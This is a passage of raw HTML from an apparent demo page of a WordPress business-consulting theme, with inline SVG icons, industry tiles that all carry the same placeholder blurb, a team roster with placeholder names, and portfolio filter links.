c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>	        
				<h5><a href="#">Consumer Products</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Airlines & Transport</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>	        
				<h5><a href="#">Natural Resources</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.989 511.989" style="enable-background:new 0 0 511.989 511.989;" xml:space="preserve">
<g>
	<path d="M504.89,145.383L320.201,38.759c-3.291-1.906-7.127-2.413-10.798-1.43c-3.673,0.985-6.74,3.344-8.627,6.628l-12.728,22.041   c-1.799-0.322-3.647-0.5-5.537-0.5H156.94c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h125.57c9.021,0,16.36,7.334,16.36,16.35   v346.95c0,9.016-7.339,16.351-16.36,16.351H61.05c-9.021,0-16.36-7.335-16.36-16.351v-45.304h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.921-4.817-10.738-10.739-10.738H10.739C4.817,357.583,0,362.4,0,368.321v19.435   c0,5.922,4.817,10.739,10.739,10.739H29.69v45.304c0,17.287,14.068,31.351,31.36,31.351h221.46c17.292,0,31.36-14.063,31.36-31.351   V307.929l47.71,27.545c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245   l-55.21-31.875v-23.21l65.26,37.675c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   c2.071-3.588,0.842-8.175-2.745-10.245l-72.76-42.005V226.87l82.81,47.814c1.182,0.682,2.471,1.006,3.744,1.006   c2.591,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-90.311-52.146v-23.209l100.36,57.945   c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-107.86-62.275   v-72.17c0-10.015-4.727-18.94-12.062-24.684l11.565-20.026l183.342,105.846L337.944,432.978c-3.462-1.548-7.608-0.26-9.548,3.099   c-2.072,3.586-0.845,8.174,2.742,10.246c2.23,1.289,4.669,1.901,7.08,1.901c4.915-0.001,9.707-2.549,12.347-7.105l159.538-276.324   C513.999,158.015,511.665,149.31,504.89,145.383z M15,372.583h44.383v10.912H15V372.583z"></path>
	<path d="M430.955,155.172l-82.268-47.497c-3.588-2.071-8.174-0.843-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l82.268,47.497c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   C435.771,161.83,434.542,157.243,430.955,155.172z"></path>
	<path d="M10.739,153.406H29.69v55.593c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-55.593h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.922-4.817-10.739-10.739-10.739H44.69V96.848c0-9.016,7.339-16.35,16.36-16.35   h65.9c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-65.9c-17.292,0-31.36,14.063-31.36,31.35v15.645H10.739   C4.817,112.493,0,117.31,0,123.232v19.435C0,148.589,4.817,153.406,10.739,153.406z M15,127.493h44.383v10.913H15V127.493z"></path>
	<path d="M10.739,275.95h18.952v59.254c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5V275.95h18.953   c5.921,0,10.739-4.817,10.739-10.738v-19.435c0-5.922-4.817-10.739-10.739-10.739H10.739C4.817,235.038,0,239.855,0,245.777v19.435   C0,271.133,4.817,275.95,10.739,275.95z M15,250.038h44.383v10.912H15V250.038z"></path>
	<path d="M103.629,147.61v38.978c0,7.112,5.786,12.898,12.898,12.898h110.504c7.112,0,12.898-5.786,12.898-12.898V147.61   c0-7.112-5.786-12.898-12.898-12.898H116.527C109.415,134.712,103.629,140.498,103.629,147.61z M118.629,149.712H224.93v34.774   H118.629V149.712z"></path>
</g>
</svg>	        
				<h5><a href="#">Private Equity</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
	        our team	        <h3>Team Leaders of Company</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
						<img src="https://maxbizz.s3.amazonaws.com/images/team5.jpg" alt="Mary Flynn">					
						<h6>Mary Flynn</h6>						CHIEF TECHNOLOGY OFFICER												
							<a rel="nofollow" 
								href="">
															</a>
														<a rel="nofollow" 
								href="">
															</a>
																					<a rel="nofollow" 
								href="">
															</a>
						<img src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="Monica Black">					
						<h6>Monica Black</h6>						CHIEF COMMUNICATION OFFICER												
							<a rel="nofollow" 
								href="">
															</a>
														<a rel="nofollow" 
								href="">
															</a>
																					<a rel="nofollow" 
								href="">
															</a>
						<img src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="Peter Perish">					
						<h6>Peter Perish</h6>						CHIEF BUSINESS PROJECT												
							<a rel="nofollow" 
								href="">
															</a>
														<a rel="nofollow" 
								href="">
															</a>
																					<a rel="nofollow" 
								href="">
															</a>
						<img src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="Olivia Woodson">					
						<h6>Olivia Woodson</h6>						INTERNATIONAL CONSULTANT												
							<a rel="nofollow" 
								href="">
															</a>
														<a rel="nofollow" 
								href="">
															</a>
																					<a rel="nofollow" 
								href="">
															</a>
						<img src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="Peter Adams">					
						<h6>Peter Adams</h6>						CO-FOUNDER OF COMPANY												
							<a rel="nofollow" 
								href="">
															</a>
														<a rel="nofollow" 
								href="">
															</a>
																					<a rel="nofollow" 
								href="">
															</a>
						<img src="https://maxbizz.s3.amazonaws.com/images/team6.jpg" alt="Adam Oswald">					
						<h6>Adam Oswald</h6>						CHIEF MARKETING OFFICER												
							<a rel="nofollow" 
								href="">
															</a>
														<a rel="nofollow" 
								href="">
															</a>
																					<a rel="nofollow" 
								href="">
															</a>
						<img src="https://maxbizz.s3.amazonaws.com/images/team7.jpg" alt="Kate Green">					
						<h6>Kate Green</h6>						CHIEF FINANCIAL OFFICER												
							<a rel="nofollow" 
								href="">
															</a>
														<a rel="nofollow" 
								href="">
															</a>
																					<a rel="nofollow" 
								href="">
															</a>
						<img src="https://maxbizz.s3.amazonaws.com/images/team8.jpg" alt="Harry Septem">					
						<h6>Harry Septem</h6>						CO-FOUNDER OF COMPANY												
							<a rel="nofollow" 
								href="">
															</a>
														<a rel="nofollow" 
								href="">
															</a>
																					<a rel="nofollow" 
								href="">
															</a>
			<h2>Doing the Right Thing, at the Right Time</h2>		
	        <a href="https://vimeo.com/87959439">
					        </a>
	        watch video	    
        	<h6>trusted<br> clients</h6>      				        
        	<h6>finished<br> projects</h6>      				        
        	<h6>years of<br> experience</h6>      				        
        	<h6>visited<br> conferences</h6>      				        
	        portfolio	        <h3>Our Latest Case Studies</h3>	    
	        		<ul>
	        				        			 	<li><a href="#" data-filter="*">All</a></li>
	        					                		                    <li>
								<a href='#' data-filter='.category-15'>business</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-16'>finance</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-17'>marketing</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-19'>startup</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-20'>strategy</a>
							</li>	                    
		                					</ul>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/">
